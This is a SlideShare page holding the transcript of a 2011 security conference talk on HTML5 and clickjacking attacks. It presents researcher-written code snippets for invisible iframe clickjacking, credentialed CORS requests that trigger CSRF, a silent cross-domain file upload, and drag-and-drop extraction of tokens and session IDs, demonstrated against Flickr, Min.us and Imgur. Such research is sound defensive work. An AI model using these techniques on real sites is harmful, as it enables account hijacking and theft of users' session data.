Html5: something wicked this way comes
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

Html5: something wicked this way comes

  • 4,985 views
Uploaded on

Talk given at SecurityByte 2011 conference. ...

Talk given at SecurityByte 2011 conference.

All the demos can be searched for in http://blog.kotowicz.net

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
4,985
On Slideshare
4,931
From Embeds
54
Number of Embeds
7

Actions

Shares
Downloads
54
Comments
0
Likes
3

Embeds 54

http://paper.li 34
http://twitter.com 9
https://www.linkedin.com 6
https://twitter.com 2
http://us-w1.rockmelt.com 1
http://a0.twimg.com 1
http://www.linkedin.com 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. HTML5:Something wicked this way comesKrzysztof KotowiczSecuring 1
  • 2. About me• security researcher • HTML 5 • UI redressing / clickjacking • xss-track, squid-imposter, ...• pentester• IT security trainer • „Hacking HTML5” 2
  • 3. Plan• Same origin policy• Exploiting users• Attack gadgets• Wrap-up 3
  • 4. Same origin policy• the single most important security concept for the web• restricts communication between websites from different domains• has many flavors• without it hell breaks loose 4
  • 5. Same origin policy• can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing• or ignored... • by exploiting users • UI redressing (clickjacking) 5
  • 6. Exploiting users Users• Like games • 100 mln play social games //goo.gl/RRWlM• Are not security-savvy 6
  • 7. Exploiting users //goo.gl/DgPpY 7
  • 8. Combined attacks• Gadgets • HTML5 • UI redressing• Join them• New attacks 8
  • 9. Gadgets 9
  • 10. Basic clickjacking 10
  • 11. Basic clickjacking 20x20 <iframe> 11
  • 12. Basic clickjacking <iframe> -300 -350 20x20 12
  • 13. Basic clickjacking <iframe> Victim website 20x20 Like us, plz! 13
  • 14. Basic clickjacking <iframe src=outer.htmlwidth=20 height=20 scrolling=nostyle="opacity:0;"></iframe><!-- outer.html --><iframe src="//victim" width=5000height=5000 style="position:absolute; top:-300px; left:-350px;"></iframe> 14
  • 15. Basic clickjacking• Trick: Click here to see a video!• User action: click+ Any clickable action+ Works in every browser- X-Frame-Option- JS framebusting 15
  • 16. HTML5 IFRAME sandbox• Used to embed untrusted content • prevents XSS • prevents defacement• Facilitates clickjacking!<iframe sandbox="allow-same-originallow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 16
  • 17. HTML5 IFRAME sandbox+ Chrome / Safari / IE 10+ Will disable most JS framebusters- X-Frame-Option 17
  • 18. Cross Origin Resource Sharing• HTML5-ish• Cross domain AJAX• With cookies• Blind • Unless the receiving site agrees• Not limited to <form> syntax• Used to trigger CSRF 18
  • 19. Cross Origin Resource Sharingvar xhr = new XMLHttpRequest();    xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want"); 19
  • 20. Cross Origin Resource SharingPOST / HTTP/1.1Host: victimConnection: keep-aliveReferer: http://dev.localhost/temp/cors.phpContent-Length: 15Origin: http://dev.localhostContent-Type: text/plain...Cookie: my-cookie=myvalueAnything I want 20
  • 21. Silent file upload• File upload purely in Javascript• Silent <input type=file> with any file name and content• Uses CORS• How? Create raw multipart/form-data 21
  • 22. Silent file uploadfunction fileUpload(url, fileData, fileName) {   var fileSize = fileData.length,     boundary = "xxxxxxxxx",     xhr = new XMLHttpRequest();       xhr.open("POST", url, true);   xhr.withCredentials = "true";   xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);   xhr.setRequestHeader("Content-Length", fileSize); 22
  • 23. Silent file uploadvar body = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + "rnContent-Type: application/octet-streamrnrn + fileData + rn-- + boundary + --;xhr.send(body); 23
  • 24. Silent file upload+ No user action+ No frames+ Cross-domain, with cookies+ Works in most browsers+ You can add more form fields- CSRF flaw needed- No access to response 24
  • 25. Silent file upload DEMO Flickr.com 25
  • 26. Flickr.com attack toolbox• Remember me • Flickr creates logged session on first request• CSRF file upload • http://up.flickr.com/photos/upload/transfer/ • accepts file uploads • token check skipped 26
  • 27. Drag into• Put attackers content into victim form 27
  • 28. Drag into DEMO Alphabet Hero 28
  • 29. Drag into• Trick: Put paper in the can!• User action: drag & drop, click+ Inject arbitrary content+ Trigger self-XSS- Firefox only- X-Frame-Option- JS framebusting 29
  • 30. Drag into Self-XSS in real life:• wordpress 0-day (Jelmer de Hen) //goo.gl/dNYi5• chronme.com (sneaked.net) //goo.gl/hs7Bw• Google Code vulns (Amol Naik) //goo.gl/NxKFY 30
  • 31. Drag out content extraction image image 31
  • 32. Drag out content extraction image victim <iframe> image 32
  • 33. Drag out content extraction image victim <iframe> textarea <textarea> 33
  • 34. Drag out content extraction<div id=game style="position:relative">   <img style="position:absolute;..." src="paper.png" />  <img style="position:absolute;..." src="trash.png" />      <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe>   <textarea style="position:absolute; opacity:0;..." id=dropper></textarea></div> 34
  • 35. Drag out content extraction 35
  • 36. Drag out content extraction 36
  • 37. Drag out content extraction$("#iframe").attr(src, outer.html’);$(#dropper).bind(drop, function() {    setTimeout(function() {        var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/);        if (urlmatch) {            var token = urlmatch[1];            // do EVIL        }    }, 100);}); 37
  • 38. Drag out content extraction• Trick: Put paper in the can!• User action: drag & drop+ Access sensitive content cross domain- Firefox only- X-Frame-Option- JS framebusting 38
  • 39. Drag out content extraction DEMO Min.us 39
  • 40. Min.us attack toolbox• CORS to create gallery• social engineering • extract gallery editor-id from <a href>• silent file upload to gallery• CORS change gallery to public• HTML5 + UI redressing combined! 40
  • 41. View-source• Display HTML source in frame • session IDs • tokens • private data<iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"></iframe> 41
  • 42. View-source 42
  • 43. View-source 43
  • 44. View-source• Trick: Your serial number is...• User action: select + drag & drop, copy-paste+ Beats JS framebusting+ Already earned $500 from Facebook- X-Frame-Options- Firefox only- Complicated user action 44
  • 45. View-source DEMO Imgur.com 45
  • 46. Imgur.com attack toolbox• framed view-source: • captcha-like string (AdSense ID) • session ID• social engineering: • trick to copy/paste page source• Exploitation: • http://api.imgur.com • cookie auth, no IP limits for session 46
  • 47. Summary• UI redressing attacks are improving• HTML5 helps exploiting vulnerabilities• Users can be a weak link too! Devs: Use X-Frame-Options: DENY 47
  • 48. Links• html5sec.org• code.google.com/p/html5security• www.contextis.co.uk/research/white-papers/ clickjacking• blog.kotowicz.net• github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl 48
  • 49. ?49